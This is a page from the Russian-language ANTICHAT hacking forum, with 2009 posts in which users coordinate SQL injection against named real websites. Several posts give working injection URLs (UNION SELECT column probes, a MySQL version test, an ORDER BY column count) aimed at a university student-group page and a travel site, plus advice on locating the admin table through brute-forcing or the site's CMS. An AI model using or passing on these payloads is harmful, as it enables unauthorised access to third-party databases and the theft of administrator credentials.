ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5521  
Старый 17.02.2009, 20:32
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

чем лучше переводить текс в хек ... дайте ссылочку ... и лутче онлайн
 
Ответить с цитированием

  #5522  
Старый 17.02.2009, 20:50
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

Цитата:
Сообщение от f1ng3r  
чем лучше переводить текс в хек ... дайте ссылочку ... и лутче онлайн
PHP код:
<?
$n
="Тут текст, который надо захексить"
echo 
"0x".bin2hex($n);
?>
 
Ответить с цитированием

  #5523  
Старый 17.02.2009, 20:53
[JavaScript]
Познающий
Регистрация: 14.02.2009
Сообщений: 45
Провел на форуме:
96296

Репутация: 74
По умолчанию

f1ng3r, специально для тебя написал http://yandexclub.ru/hack/hex.php
 
Ответить с цитированием

  #5524  
Старый 17.02.2009, 20:59
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию

f1ng3r
http://noxak.ru/tools/ - тут много во что перевести можно... вобщем отличная вещь!
 
Ответить с цитированием

  #5525  
Старый 18.02.2009, 07:14
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Цитата:
http://studorgs.bowdoin.edu/meddies/news.php?nid=-10+unoin+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18/*
что думаете?
 
Ответить с цитированием

  #5526  
Старый 18.02.2009, 09:47
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Цитата:
Сообщение от sabe  
что думаете?
Цитата:
http://studorgs.bowdoin.edu/meddies/news.php?nid=-10+unoin+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18/*
долго ломал голову что там)))
после этого запроса все стало понятно
Код:
http://studorgs.bowdoin.edu/meddies/news.php?nid=10+and+substring(version(),1,1)=3/*
3 ветка,поэтому вывода нет (union введён с четвётой версии mysql)

p.s там вроде 8 полей) а не 18
Код:
http://studorgs.bowdoin.edu/meddies/news.php?nid=-10+order+by+8/*

Последний раз редактировалось z00MAN; 18.02.2009 в 10:28..
 
Ответить с цитированием

  #5527  
Старый 18.02.2009, 15:11
$p01nt
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540

Репутация: 96
По умолчанию

Помогите найти табличку с админами...
Цитата:
http://www. travelwings .ru/article.php?id_article=-5+union+select+1,2,3,4,5,6,7,8,9,0,1/*
 
Ответить с цитированием

  #5528  
Старый 18.02.2009, 15:53
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Думаю, что тебе поможет брутер+список названия таблиц...
 
Ответить с цитированием

  #5529  
Старый 18.02.2009, 15:59
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от -m0rgan-  
Думаю, что тебе поможет брутер+список названия таблиц...
Можно и так, но есть способ лучше

Заходим в админку:
http://www.travelwings.ru/admin/login.php
Видим вверху надпись:
Citrus CMS v2.0
Гуглим и находим офф сайт этой цмс:
http://citrus-soft.ru
Видим. что она платная, значит с кодом обламываемся , но в портфолио присутствуют ещё сайты на этом движке, и существует вероятность найти пятую ветку и посмотреть структуру базы. Удачи
 
Ответить с цитированием

  #5530  
Старый 18.02.2009, 16:15
$p01nt
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540

Репутация: 96
По умолчанию

jokester, я этим в первую очередь и занялся... болт там, все на 4ой!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ